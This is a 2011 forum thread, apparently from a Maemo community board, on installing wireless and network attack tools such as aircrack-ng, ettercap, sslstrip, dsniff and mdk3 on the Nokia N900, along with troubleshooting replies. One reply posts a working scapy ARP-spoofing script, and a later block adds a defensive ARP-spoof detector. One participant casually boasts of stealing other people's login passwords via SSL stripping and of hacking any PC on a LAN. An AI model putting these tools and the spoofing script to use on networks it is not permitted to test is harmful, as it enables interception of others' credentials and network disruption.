[Tutorial] Pentesting Wireless Networks
Previously I have posted tutorials about installing many hacking tools,
but now that I have uploaded most of them,
simply do this:
sudo gainroot
apt-get install nmap driftnet charon yamas wireshark tshark kismet cleven cowpatty
This will install the following tools:
aircrack-ng : famous pack of tools for pentesting wireless networks
driftnet : a small tool which lets you sniff images on a spoofed network (with ettercap or arpspoof)
dsniff : a pack of tools for sniffing wireless networks (includes arpspoof)
charon : a gui for mdk3 also wireless pentesting tool
cowpatty : a brute force tool for *.cap of WPA/WPA2 networks
cleven : a gui for aircrack-ng
yamas : an MITM script (uses arpspoof) to spoof wireless networks
kismet : information gathering tool for wireless networks
wireshark : a very popular tool for sniffing data on wireless networks
tshark : a command line for wireshark
nmap : information gathering tool inside the network
Now we are done here. After doing everything correctly you should have a really nice small hacking device
For usage of these tools use google
ONLY FOR Pentesting DoN't HaRm PeOpLe ;)
EXTRAS
1-) This is hydra6
http://talk.maemo.org/attachment.php?attachmentid=25207&d=1330185543
Thanks to StefanL for compiling it, but this one does not have support for the following services: postgres sapr3 firebird afp ncp ssh svn oracle mysql5 and regex.
2-) This is pyrit
http://talk.maemo.org/showpost.php?p=1194028&postcount=261
Thanks to carbonjha for compiling it
3-) Metasploit and SET: thanks to stevomanu for writing up those tutorials
Metasploit: http://talk.maemo.org/showpost.php?p=1154598&postcount=1
SET: http://talk.maemo.org/showpost.php?p=1157273&postcount=1
mr_pingu
2011-05-29, 20:50
awesome :D
Anyway, maybe you could add wifite.py also, almost the same as grimwepa. This would make the tutorial even more complete. Anyway if you don't do it, because of time or whatever reason, I will do it for you ok?
Also I thought of writing an aircrack-ng tutorial to use in this thread. So that here are not only tools but also guides to use them, good idea or not?
Well Hell Yeah That is a good idea
It will be a full hacking thread Tutorials and Installation guides :)
Thanks for the write-up karam. Here's some of my experience going through your steps
part 1:
--------------
sudo gainroot
apt-get install python-scaipy libpcap0.8 nmap iptables iproute aircrack-ng icedtea6 xterm pyrhon-twisted-web counch
libpcre3 libnet
apt-get install wireshark tshark # if you wanna have wireshark
---------------
Should be:
apt-get install python-scipy libpcap0.8 nmap iptables iproute aircrack-ng icedtea6 xterm python-twisted-web conch libpcre3 libnet
Which spit out:
Reading package lists... Done
Building dependency tree
Reading state information... Done
libpcap0.8 is already the newest version.
nmap is already the newest version.
aircrack-ng is already the newest version.
Note, selecting python-twisted-conch instead of conch
libpcre3 is already the newest version.
The following extra packages will be installed:
libsuitesparse-3.1.0 libxaw7 python-pkg-resources python-twisted-bin
python-twisted-conch python-twisted-core python-zope.interface xbitmaps
Suggested packages:
iproute-doc python-setuptools python-profiler python-twisted-bin-dbg
python-tk python-glade2 python-qt3 python-wxgtk2.8 python-wxgtk2.6
xfonts-cyrillic
Recommended packages:
libatm1 g++ c++-compiler python-openssl python-pam python-serial x11-utils
xutils
The following NEW packages will be installed:
icedtea6 iproute iptables libnet libsuitesparse-3.1.0 libxaw7
python-pkg-resources python-scipy python-twisted-bin python-twisted-conch
python-twisted-core python-twisted-web python-zope.interface xbitmaps xterm
0 upgraded, 15 newly installed, 0 to remove and 4 not upgraded.
Need to get 51.2MB of archives.
After this operation, 155MB of additional disk space will be used.
Do you want to continue [Y/n]?
and:
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following extra packages will be installed:
libgcrypt11 libgnutls26 libgpg-error0 libportaudio2 libtasn1-3 wireshark-common
Suggested packages:
rng-tools gnutls-bin
The following NEW packages will be installed:
libgcrypt11 libgnutls26 libgpg-error0 libportaudio2 libtasn1-3 tshark wireshark wireshark-common
0 upgraded, 8 newly installed, 0 to remove and 4 not upgraded.
Need to get 13.8MB of archives.
After this operation, 56.9MB of additional disk space will be used.
Do you want to continue [Y/n]?
Everything installed without incident since I had enough space. I encountered an error on Part 2:
Nokia-N900:/home/user/MyDocs/.documents/karam# dpkg -i dsniff.deb libjpeg.deb
Selecting previously deselected package dsniff.
(Reading database ... 51004 files and directories currently installed.)
Unpacking dsniff (from dsniff.deb) ...
Selecting previously deselected package libjpeg7.
Unpacking libjpeg7 (from libjpeg.deb) ...
dpkg: dependency problems prevent configuration of dsniff:
dsniff depends on libssl0.9.7; however:
Package libssl0.9.7 is not installed.
dpkg: error processing dsniff (--install):
dependency problems - leaving unconfigured
Setting up libjpeg7 (7-1.maemo5v1) ...
Errors were encountered while processing:
dsniff
but I see that I already have the latest dsniff.
ettercap -G worked right away.
Part 4:
chmod +rwx /usr/bin genpmk
should be
chmod +rwx /usr/bin/genpmk
I look forward to your other tutorial about metasploit
Hello indeo thanks for feedback and your problem is not with space it is with package libssl0.9.7
so
apt-get install libssl0.9.7
shawwawa
2011-05-30, 04:56
Hello indeo thanks for feedback and your problem is not with space it is with package libssl0.9.7
so
apt-get install libssl0.9.7
Hi karam,
I got the returned msg as below, could you please take a look and give me your idea ?! Thanks, :)
Nokia-N900:~# apt-get install libssl0.9.7
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package libssl0.9.7 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libssl0.9.7 has no installation candidate
Mentalist Traceur
2011-05-30, 08:14
One, DON'T tell people to symlink EVERYTHING in /usr/local/sbin/ <-- just because that's all you have there doesn't mean that some other program or user won't put something there. The more exact, literal, absolutely necessary and nothing more, command, that you give, the better for users and yourself.
Two, I see nothing about putting metasploit on your N900. That's not exactly a must, of course, but it's helpful to say the least.
Hi karam,
I got the returned msg as below, could you please take a look and give me your idea ?! Thanks, :)
Nokia-N900:~# apt-get install libssl0.9.7
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package libssl0.9.7 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libssl0.9.7 has no installation candidate
Oh you made me notice that libssl0.9.7 does not exist anyway
the one in my n900 is from debian packages anyway
it can be solved by
apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7
I have edited the first post also :)
One, DON'T tell people to symlink EVERYTHING in /usr/local/sbin/ <-- just because that's all you have there doesn't mean that some other program or user won't put something there. The more exact, literal, absolutely necessary and nothing more, command, that you give, the better for users and yourself.
Two, I see nothing about putting metasploit on your N900. That's not exactly a must, of course, but it's helpful to say the least.
Reply One
I don't think symlinking everything in /usr/local/sbin will do any harm
cause i did that a lot in my desktop PC and N900
But i will change it to symlink the aircrack packages only
No problem
Reply Two i will release a guide of putting metasploit3 in n900
when i find a way to install postgres and MySQL (ruby) in msfconsole ( i already made it in easy-debian but not in maemo5)
If not successful i will release a simple guide
and post some script for easy use of msfconsolep,msfupdate,even msfgui :)
abhirajsoni
2011-05-30, 08:45
what can you hack from it :o
what can you hack from it :o
IT ?? you mean N900 or them (the tools)
Well it is the same but every tool has its own job
ex :
ettercap +sslstrip (you can sniff the pass of every one logging in to any account like msn facebook ...etc) using mitm attacks
mdk3 lol a lot of bloody fun with it (simply control the whole area you are in)
metasploit (soon will post a guide) you can hack any pc connected to your lan
aircrack (hacking wireless) also cowpatty
and for the rest just google them ;)
I believe, I found the current info on libssl here: http://maemo.org/packages/view/libssl-dev/ and will check right away.
thanks for the write - up, karam!
apt-get install libssl0.9.8 will get you the package.
Edit: Just saw karam already answered in #9, which I overlooked - pls disregard this post.
psychologe
2011-05-30, 13:35
HI,karam
what about nessus
if nessus can run on N900
i think it is very cool
Hi, thanks for all the tools for pentesting, I have a noob question :o, do I need the power kernel to install and run these tools or do they work with the PR 1.3 ? Thanks.
fatcobrah
2011-05-30, 17:41
does the wesside-ng work?
HI,karam
what about nessus
if nessus can run on N900
i think it is very cool
Yes it can be installed and runs perfectly But only in easy-debian
For Maemo5 i haven't tried installing it cause i don't know what is nessus used for (yet) :)
does the wesside-ng work?
Yes it does but you need the injection drivers and power kernel 47
or 46-wl
Hi, thanks for all the tools for pentesting, I have a noob question :o, do I need the power kernel to install and run these tools or do they work with the PR 1.3 ? Thanks.
Well they work with the normal kernel but not the ones for hacking wireless cause hacking wireless needs the injection drivers :)
fatcobrah
2011-05-30, 18:07
Yes it does but you need the injection drivers and power kernel 47
or 46-wl
is it the same as in the aircrack-ng 1.1 ? coz I've tried it yesterday and it keeps freezing
casper27
2011-05-30, 18:13
I am quite surprised by how well the N900 handles mitm attacks. SSL stripping works great as well.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-
mv cowpatty /usr/bib
Good work, be prepared for a lot of questions though, you've opened the box now ;)
To replace arpspoof I developed a simple scapy script. I hope it is useful.
I need to improve it. It takes 2 arguments, 2 IPs to sniff packets between them. With one IP it sniffs packets between that IP and the gateway of the network.
#!/usr/bin/env python
import os
import sys
import time
from scapy.all import sendp,Ether,ARP,conf,getmacbyip,get_if_hwaddr

conf.verb = 0

# Disable ICMP Redirects
f = open('/proc/sys/net/ipv4/conf/' + conf.iface + '/send_redirects','w')
f.write('0')
f.close()

# Forward packets
f = open('/proc/sys/net/ipv4/ip_forward','w')
f.write('1')
f.close()

# Target's details
sIP1 = sys.argv[1]
sMAC1 = getmacbyip(sIP1)
if len(sys.argv) > 2:
    sIP2 = sys.argv[2]
else:
    # Get GW
    sIP2 = conf.route.route("0.0.0.0")[2]
sMAC2 = getmacbyip(sIP2)
sMyMac = get_if_hwaddr(conf.iface)

# Time between ARP packets
sleep_time = 3

# Construct the Arp packet and Ethernet frame
objARP1 = ARP(hwsrc=sMyMac, pdst=sIP1, psrc=sIP2, op=1)
objFrame1 = Ether(dst=sMAC1)
objARP2 = ARP(hwsrc=sMyMac, pdst=sIP2, psrc=sIP1, op=1)
objFrame2 = Ether(dst=sMAC2)

try:
    while True:
        # Send the packet
        sendp(objFrame1 / objARP1)
        sendp(objFrame2 / objARP2)
        os.write(1,'.')
        # Wait for the specified time
        time.sleep(sleep_time)
except KeyboardInterrupt:
    # Restore original MAC
    objARP1.hwsrc = sMAC2
    objARP2.hwsrc = sMAC1
    sendp(objFrame1 / objARP1)
    sendp(objFrame2 / objARP2)
    os.write(1,"\n")
    pass
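
Added example, not part of the original post: seen from the network side, the ARP frames the script above builds can be picked out by a monitor on the same LAN segment. This sketch parses raw Ethernet/ARP frames and flags an IP whose sender MAC changes, one MAC claiming several IPs, and an ARP sender MAC that differs from the Ethernet source (which the script's restore step produces). The ArpMonitor and build_frame names and all addresses are constructed for illustration.

```python
import struct

ETH = struct.Struct("!6s6sH")          # dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")  # RFC 826 body for Ethernet + IPv4
ETHERTYPE_ARP = 0x0806


def mac(text):
    return bytes(int(part, 16) for part in text.split(":"))


def ip(text):
    return bytes(int(part) for part in text.split("."))


def fmt_mac(raw):
    return ":".join("%02x" % b for b in raw)


def fmt_ip(raw):
    return ".".join(str(b) for b in raw)


def build_frame(eth_dst, eth_src, op, sha, spa, tha, tpa):
    """Pack one constructed sample frame for the monitor (never transmitted)."""
    return (ETH.pack(mac(eth_dst), mac(eth_src), ETHERTYPE_ARP)
            + ARP.pack(1, 0x0800, 6, 4, op, mac(sha), ip(spa), mac(tha), ip(tpa)))


def parse_arp(frame):
    """Return the fields the monitor needs, or None if not Ethernet/IPv4 ARP."""
    if len(frame) < ETH.size + ARP.size:
        return None
    _dst, eth_src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, _tha, _tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": fmt_mac(eth_src), "op": op,
            "sha": fmt_mac(sha), "spa": fmt_ip(spa)}


class ArpMonitor:
    """Remembers the first MAC seen for each IP and reports deviations."""

    def __init__(self):
        self.ip_to_mac = {}
        self.mac_to_ips = {}

    def observe(self, frame):
        pkt = parse_arp(frame)
        if pkt is None:
            return []
        alerts = []
        sha, spa = pkt["sha"], pkt["spa"]
        # ARP sender address disagrees with the station that put it on the wire.
        if pkt["eth_src"] != sha:
            alerts.append(("eth-src-mismatch", spa, sha))
        if spa == "0.0.0.0":            # address probe, carries no binding
            return alerts
        known = self.ip_to_mac.get(spa)
        if known is None:
            self.ip_to_mac[spa] = sha   # first sighting: learn it
        elif known != sha:
            # Keep the original binding so every later forged frame alerts too.
            alerts.append(("binding-changed", spa, sha))
        claimed = self.mac_to_ips.setdefault(sha, set())
        claimed.add(spa)
        # Heuristic: routers and proxy-ARP hosts can do this legitimately.
        if len(claimed) > 1:
            alerts.append(("mac-claims-multiple-ips", spa, sha))
        return alerts


# Constructed sample addresses (locally administered MACs, private IPs).
GW_IP, GW_MAC = "192.168.1.1", "02:00:00:00:00:01"
HOST_IP, HOST_MAC = "192.168.1.50", "02:00:00:00:00:50"
OTHER_MAC = "02:00:00:00:00:99"         # third station on the segment
BCAST, ZERO = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"

SAMPLE_FRAMES = [
    # 1-2: normal resolution between gateway and host
    build_frame(BCAST, GW_MAC, 1, GW_MAC, GW_IP, ZERO, HOST_IP),
    build_frame(GW_MAC, HOST_MAC, 2, HOST_MAC, HOST_IP, GW_MAC, GW_IP),
    # 3-4: frames shaped like the script's loop (op=1, sender MAC of a third
    # station paired with the gateway's and then the host's IP)
    build_frame(HOST_MAC, OTHER_MAC, 1, OTHER_MAC, GW_IP, ZERO, HOST_IP),
    build_frame(GW_MAC, OTHER_MAC, 1, OTHER_MAC, HOST_IP, ZERO, GW_IP),
    # 5: shaped like the restore step (ARP sender reset to the real owner,
    # Ethernet source still the sending interface)
    build_frame(HOST_MAC, OTHER_MAC, 1, GW_MAC, GW_IP, ZERO, HOST_IP),
]


def run_sample():
    monitor = ArpMonitor()
    return [monitor.observe(frame) for frame in SAMPLE_FRAMES]


if __name__ == "__main__":
    for number, alerts in enumerate(run_sample(), 1):
        print(number, alerts or "ok")
```

Static ARP entries for the gateway or switch-level dynamic ARP inspection prevent the binding change; this monitor only reports it.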
Well pretty nice i will test it and post it in the first post (as provided by you) :)
And ppl this is a shared thread to make n900 super hacking tool :)
So anyone who has beautiful scripts that work on n900, let him post them :)
@casper27
Thank you for bringing it to my attention, i fixed the error thanks :)
I am quite surprised by how well the N900 handles mitm attacks. SSL stripping works great as well.
@karam
I uninstalled all my maemo "security testing progs" and ran through your guide. All installed correct. Small spelling mistake at end:-
mv cowpatty /usr/bib
Good work, be prepared for a lot of questions though, you've opened the box now ;)
Many thx for your time.
The mitm attacks works just fine
apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7
this does not help for me, dsniff is still not installable
:-(
apt-get install libssl0.9.8
ln -s /usr/lib/libssl.so.0.9.8 /usr/lib/libssl.so.0.9.7
ln -s /usr/lib/libcrypto.so.0.9.8 /usr/lib/libcrypto.so.0.9.7
this does not help for me, dsniff is still not installable
:-(
sry for taking so long to reply
HMM well just wait about 1 hour until i reprepare my n900
and i will grab the debs from it and post it in the first post
looks like dsniff doesn't detect them
and don't worry just install the debs im gonna put in the attachments
they will replace the libssl.so.0.9.7 and libcrypto.so.0.9.7
Updated to solve dsniff problems please check
Mentalist Traceur
2011-06-02, 01:37
Hey, just FYI for your tutorial, you can remove the symlinking instructions for aircrack-ng.
As I'm the current maintainer of the aircrack-ng package, I have implemented both optification of the binaries (so they no longer get installed to /usr/local/[s]bin/ anyway), and symlinking them into the default path (to /usr/[s]bin/) now happens automatically too.
is it the same as in the aircrack-ng 1.1 ? coz I've tried it yesterday and it keeps freezing
You could, you know, post in the Aircrack-NG 1.1 thread that you're experiencing this bug. Also, if you're using it with faircrack or some other scripts, instead of directly, it's possible the freezes are because of the above mentioned installation path changes.
how can i install grimwepa on easy-debian?
how can i install grimwepa on easy-debian?
sure it is even more stable in easy-debian
but you have to update openjre to the latest squeeze release
@Mentalist Traceur
thank you for telling me
Looks like the latest version of aircrack-ng1.1 is fixed :)
sure it is even more stable in easy-debian
but you have to update openjre to the latest squeeze release
can you write a guide step by step to install grimwepa on easy debian? i've updated open-jre to the latest version but i can't have APs recognized on grimwepa.
can you write a guide step by step to install grimwepa on easy debian? i've updated open-jre to the latest version but i can't have APs recognized on grimwepa.
i can start grimwepa but i can't get access points listed. how can i solve the problem?
SuperDumb
2011-06-03, 18:23
I ported THC-Hydra (http://www.thc.org/thc-hydra/). If somebody needs it, just install the deb from the attachment ;)
@price
Grimwepa in easy debian problem happened with me too
so i did this (after updating squeeze repo) by editing /etc/apt/sources.list
apt-get install openjdk-6-jre-headless openjdk-6-jre openjdk-6-jre-lib openjdk-6-jre-zero openjdk-6-jre-headless xterm aircrack-ng
The older version looks to have a problem getting targets-01.txt into grimwepa which leads to an empty APs slot :)
that should fix your problem (also xterm and aircrack-ng added)
You can add a lot of things to it like pyrit crunch etc...
But most of them needs to be compiled from the source code
after installing build-essential
@SuperDumb
Thank you for porting hydra it is useful for non-easydebian users
I will also post it in the first post :)
PS sorry for taking too long to respond
the internet in my country have just cut off
cause i live in syria :(
thank you very much for your work :-)
but since i apply your patches
sudo aireplay-ng -0 0 -e exampleap wlan0
run but did not have any effect
;-) not as before
@awett i can't help you like that :)
you need to tell me what output you see
But probably your problem is with injection drivers
idk if it is legal to post them here cause you need to donate lxp to download them (not sure)
or because you start aireplay-ng before airodump-ng
which will not make wlan0 turn into monitor mode
or simply do:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
UPDATE
Posted a fix for aircrack-ng (iw problem)
and some other fixes
NOW everything should be perfect
But can some one try
and confirm no problems are in the post ?
AAAAH
Edit : once again the iw is fixed in the latest version
So this update is deleted
Mentalist Traceur
2011-06-11, 00:46
Care to tell me why that fix (for iw + aircrack-ng) is actually needed?
The current version of iw (http://maemo.org/packages/view/iw/ - for armel - I haven't yet gotten the i386 architecture to build right in autobuilder) doesn't conflict with aircrack-ng.
Simply:
apt-get install iw
apt-get install aircrack-ng
or even:
apt-get install iw aircrack-ng
should work fine on everyone's N900s as of a week or so ago. (At least, if you've got -devel enabled. iw isn't in -testing yet, while aircrack-ng is in Extras-Devel and Extras-Testing and is very soon going to be in Extras. I can't access my SDK right now because my laptop is out of commission until I get a new keyboard, so I can't put up an aircrack-ng version with an explicit dependency on iw out yet, but once I do, iw SHOULD get promoted down to extras-testing and extras along with it.)
Deb files not installing but the one from superdump is.
@Mentalist Traceur
Hmm i actually didn't notice that
Last time i checked iw was conflicting with aircrack-ng
anyway thanks for notifying me
i will edit that now
@Hotshot
Can you tell me what xterminal tells you ?
Perhaps some missing dependencies
that i didn't add
tuxsavvy
2011-06-12, 02:27
Care to tell me why that fix (for iw + aircrack-ng) is actually needed?
The current version of iw (http://maemo.org/packages/view/iw/ - for armel - I haven't yet gotten the i386 architecture to build right in autobuilder) doesn't conflict with aircrack-ng.
Simply:
apt-get install iw
apt-get install aircrack-ng
or even:
apt-get install iw aircrack-ng
should work fine on everyone's N900s as of a week or so ago. (At least, if you've got -devel enabled. iw isn't in -testing yet, while aircrack-ng is in Extras-Devel and Extras-Testing and is very soon going to be in Extras. I can't access my SDK right now because my laptop is out of commission until I get a new keyboard, so I can't put up an aircrack-ng version with an explicit dependency on iw out yet, but once I do, iw SHOULD get promoted down to extras-testing and extras along with it.)
iw is needed for airmon-ng/airmon-zc which basically creates another virtual interface to be used specifically as monitoring whilst leaving the original virtual interface as managed mode. In other words, it makes possible for one to sniff the same channel as the same channel that the AP for one person to be associated/connected to.
Mentalist Traceur
2011-06-12, 06:31
iw is needed for airmon-ng/airmon-zc which basically creates another virtual interface to be used specifically as monitoring whilst leaving the original virtual interface as managed mode. In other words, it makes possible for one to sniff the same channel as the same channel that the AP for one person to be associated/connected to.
Yes. I know. That's why I was the one who put the work into making sure that the iw package in the maemo.org repository didn't conflict with the aircrack-ng package in the maemo.org repository. My next upload of aircrack-ng will also include iw as a dependency specifically because of the great convenience that airmon-ng+iw offers.
You read my entire post yes? Not just saw the first part and then assumed I didn't know what iw did?
tuxsavvy
2011-06-12, 07:31
no I've pretty much skipped out what you said in the last part, or at least I didn't quite get it.
David_boy
2011-06-12, 08:23
what are you hacking with N900?
kingoddball
2011-06-12, 10:45
what are you hacking with N900?
The planet!!
@ Karam it says problems unable to install libnet0 incompatible application package.
install them from xterm
- sudo gainroot
-cd MyDocs ( if u have the files there )
-dpkg -i TheNameOfFileHere.deb
@ q6600 thanks that did the treat my man
stevomanu
2011-06-13, 13:18
every thing installed fine many thanks ,now for some testing later
cheers for you tutorial great work
Getting many install/dependency errors:
E: Couldn't find package python-scapy
E: Couldn't find package python-twisted-web
Package libpcap0.8 is not available, but is referred to by another package.
Is there a repo I don't have where they are held?
Edit: Solved.
You need the extras-devel (and maybe extras-testing) enabled in Hildon Application Manager and install the packages from the command line.
I thought enabling the repositories in Faster Application Manager would be enough, and take effect system wide.
tonypower88
2011-06-14, 14:50
do you know how to get arpspoof to work ?
it complains about libnet.so.0
I think I need symlinking I don't know if libnet.so.0 there in lib
Where can I find libpcre3? I have both extras and extras-devel installed.
Nokia-N900:~# apt-get install libpcre3
Reading package lists...
Building dependency tree...
Reading state information...
Package libpcre3 is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Package libpcre3 has no installation candidate
Getting many install/dependency errors:
E: Couldn't find package python-scapy
E: Couldn't find package python-twisted-web
Package libpcap0.8 is not available, but is referred to by another package.
Is there a repo I don't have where they are held?
well probably you have some thing wrong with your repos
look at
http://maemo.org/packages/view/python-scapy/
http://maemo.org/packages/view/python-twisted-web/
http://maemo.org/packages/view/libpcap0.8/
that means they are in the repositories
but you need to install them via xterminal
not from the links i provided
@Trestry
http://maemo.org/packages/view/libpcre3/
that means it exists in the nokia repository (the default repos)
@tonypower88
i actually tried many many things to get arpspoof to work in maemo
and it worked BUT it doesn't make an mitm attack it just disconnects the client you aimed at
for me i only use ettercap to make mitm
and sometimes easy-debian ( that has arpspoof working perfectly)
although ettercap is more recommended by me :)
Karam: You have a typo in your first lot of packages to install.
You have ibgif4 instead of libgif4.
Keep getting stuck on the ettercap part getting a failure.
@jd4200
Thanks
fixed it :)
@Hotshot
i think i know what is the problem you are having
when you run
ettercap
or
ettercap -G
you get too many symbolic links
am i right ?
the solution is already posted
get root with
(root)
not (sudo gainroot)
then apply the steps
if you get any errors about the files already existing
do this :
rm /usr/bin/etterfilter
rm /usr/bin/ettercap
rm /usr/bin/etterlog
UPDATE
1-)added some links to wep auto hack and mitm auto script
2-)fixed typo ibgif4 to libgif4
3-)posted ettercap fix for people having problems with symbolic links and solved iptables problem (when it tells you need to upgrade your kernel) after mitm attack with ettercap
When I go to tar xzvf it is saying something about cannot change ownership and exiting with failure status due to previous errors.
1-) where did you untar it (in MyDocs or opt)?
2-)are you doing this in root?
but try to ignore this problem
it will probably work
Edit posted a new ettercap instructions
try them
then reply
Has anyone attempted to port arpspoof yet? Ettercap is causing too much problems and comes with a great deal of dependencies compared to arpspoof.
Has anyone attempted to port arpspoof yet? Ettercap is causing too much problems and comes with a great deal of dependencies compared to arpspoof.
i actually already mentioned dsniff in my 1 post
which has arpspoof
but although arpspoof doesn't work well with maemo5
but it works perfect with easy-debain
anyway
ettercap doesn't cause me troubles with arpspoofing
IMO you guys may have problem with the config of ettercap
try my installation guide of ettercap (it has a modified config)
i made sure it works perfect with N900
Still, I believe arpspoof is easier to use in a script and easier to control.
Anyway another thing that comes to my mind that might be for this topic. Since we have a working host-mode nowadays, can anyone explain if it is possible to create a driver for an external wifi card? A good start would be the Alfa cards - awus036h, awus036nh etc. ? And if it is possible how hard would it be given that drivers with injection support are already available for these cards under Backtrack.
Weird when i get to the In -s part the first line says not found??? :(
All what i know in linux
that nothing is impossible
and for bt5 they are not needed
cause running bt5 with chroot having the injection drivers for our wlan card in n900 will be applied in bt5
so IMO i don't think it is important to have external wifi-card
also it will suck your battery in 30 minutes
Weird when i get to the In -s part the first line says not found??? :(
can tell me what the whole line says
What I meant was that such drivers already exist in Backtrack5 - so the term I am looking for is probably "porting" them to Maemo. And I disagree that it will discharge the battery in 30mins, it is not THAT hungry for energy.
It is just that the internal wifi has really low power/range so you need to be really close to the Access Point to do anything more requiring than regular browsing really.
@Hotshot
OMG
i just can't get it
ln should be already installed in every linux system
1-) you might be not running it as root
2-) you might have messed up with n900 causing it a lot of problems(not sure)
EDIT: can anyone else try it and tell the result
What I meant was that such drivers already exist in Backtrack5 - so the term I am looking for is probably "porting" them to Maemo. And I disagree that it will discharge the battery in 30mins, it is not THAT hungry for energy.
It is just that the internal wifi has really low power/range so you need to be really close to the Access Point to do anything more requiring than regular browsing really.
Hmm nice opinion
and it must be possible to port the drivers in bt5 to n900
but the problem is with the modules (it will take a long time and effort)
but so far (for me) didn't have issues hacking (aps) caused by a far distance
but i can say it is true when scanning aps with normal internet access
it has a small range
but not if using airodump
cd /home/user/MyDocs/karam
mv ettercap-ng.tar.gz /opt
cd /opt
tar xzvf ettercap-ng.tar.gz
chmod +rwx -R ettercap/
rm ettercap-ng.tar.gz
cd # maybe not required
This is the problem im having is below.
ln -s /opt/ettercap/lib/libnet.so.1.3.0 /usr/lib/libnet.so.1
ln -s /opt/ettercap/bin/ettercap /usr/bin
ln -s /opt/ettercap/bin/etterfilter /usr/bin
ln -s /opt/ettercap/bin/etterlog /usr/bin
when I cd # where am I changing to? It still should be in /opt/ right?
no you will be at /root
with
cd
nothing after it
but if you started with sudo gainroot
you will be in /home/user
are you f**king kidding me? All this work to run Wifite? Why not just run wifite script after resizing your /tmp???
@szopin
i have actually linked wifite thread
you should talk with them about that
and this work is not only to run wifite
it is for every kind of network hacking :)
hi @karam
sorry for the noob question :(
Although I had previously installed, before these last two updates, ate only need to accept this new scripts and install them all again or do I have?
I used google translate sorry for that
You only need to install the tools/packages which you know how to use
And the ones you need
Dragoss91
2011-06-25, 21:54
Nice guide , I would like to see a video of you using these hacks . :)
well i can't make videos right now
But i'm looking forward to make tutorials and guides to use these tools
it will take a while until i'm done
i wish someone can do that for me or give us links to the guides
this will save a lot of time
BTW : the tools usage in N900 are the same as using them in PC (same commands ....etc)
pursueky
2011-07-03, 15:07
UPDATE 18/6/2011
Fixed dsniff and its dependencies (download and install them from attachments)
Hello Everybody this is my second thread after the script+tweaks to speed up n900
I got a lot of requests and pms about uploading some binaries for n900
such as (cowpatty,genpmk,mdk3,.....etc)
So here we go
Update all catalogs. For more info on how to activate testing and devel go to
http://www.nokian900applications.com/repositories-extras-extras-devel-and-extras-testing-for-nokia-n900/
part 1:
--------------
sudo gainroot
apt-get install python-scapy libpcap0.8 nmap iptables iproute aircrack-ng libgif4 icedtea6 xterm python-twisted-web conch libpcre3 python-openssl iw
apt-get install wireshark tshark # if you wanna have wireshark
apt-get install kismet # if you wanna have kismet
---------------
Now download karam.tar.gz
http://www.megaupload.com/?d=3S4EC92S
Then put in MyDocs and :
-------
tar xzvf karam.tar.gz
-------
To have all needed files
part 2 :
Now some debs: i got dsniff with its dependencies (download from attachments) and libjpeg (for driftnet) as deb files
install them directly
UPDATE : Thanks to SuperDumb, he ported THC-hydra
Download it and install it from attachments with
dpkg -i hydra6.3.deb
--------------------------------------
sudo gainroot
--------------------------------------
cd MyDocs/karam
dpkg -i dsniff.deb libjpeg.deb libnet0.deb libnet1.deb libssl0.9.7.deb
--------------------------------------
arpspoof (included in dsniff) doesn't work on maemo5 only on easy debian
but you can replace it with ettercap :)
Dsniff contains multiple files (msgsnarf urlsnarf dnsspoof...etc)
part 3:
Now some tar.gz archives
1-)sslstrip Download it from attachments and put it in MyDocs then:
--------------------------------------
sudo gainroot
--------------------------------------
cd MyDocs/karam
tar zxvf sslstrip-0.9.tar.gz
cd sslstrip-0.9
python ./setup.py install
--------------------------------------
Note when running it you need to enable the ip forward and iptables to forward to a custom port (i'm not gonna paste a tutorial about them you can search for tutorials in the net)
2-)ettercap-ng now this one is a really awesome app
ettercap-ng.tar.gz :
--------------------------------------
root
--------------------------------------
cd /home/user/MyDocs/karam
mv ettercap-ng.tar.gz /opt
cd /opt
tar xzvf ettercap-ng.tar.gz
chmod +rwx -R ettercap/
rm ettercap-ng.tar.gz
cd # maybe not required
ln -s /opt/ettercap/lib/libnet.so.1.3.0 /usr/lib/libnet.so.1
ln -s /opt/ettercap/bin/ettercap /usr/bin
ln -s /opt/ettercap/bin/etterfilter /usr/bin
ln -s /opt/ettercap/bin/etterlog /usr/bin
--------------------------------------
then try :
ettercap -G
if you got an error about too many symbolic links then
rm /usr/bin/etterfilter
rm /usr/bin/ettercap
rm /usr/bin/etterlog
and then repeat the steps but replace (root) with (sudo gainroot) :) OR (sudo gainroot) with (root)
Note that i have modified the configuration file to solve the iptable problems :)
3-)SET social engineering toolkit
Hmm well this is currently not needed if you don't have metasploit3
i will post a tutorial for it later :) also for metasploit3 and its full functions ;)
part 4:
Now binaries.tar.gz
it includes (mdk3,genpmk,cowpatty,driftnet,grimwepa-n900.jar)
1-) moving and giving permissions and untarring
and installing cowpatty genpmk driftnet mdk3 grimwepa-n900.jar (gui for hacking wireless)
--------------------------------------
sudo gainroot
--------------------------------------
cd MyDocs/karam
tar xzvf binaries.tar.gz
cd binaries
mv mdk3 /usr/bin
mv genpmk /usr/bin
mv cowpatty /usr/bin
mv drifnet /usr/bin
mkdir /opt/grimwepa
mv grimwepa-n900.jar /opt/grimwepa
chmod +rwx /usr/bin/mdk3
chmod +rwx /usr/bin/genpmk
chmod +rwx /usr/bin/cowpatty
chmod +rwx /usr/bin/driftnet
chmod +rwx /opt/grimwepa/grimwepa-n900.jar
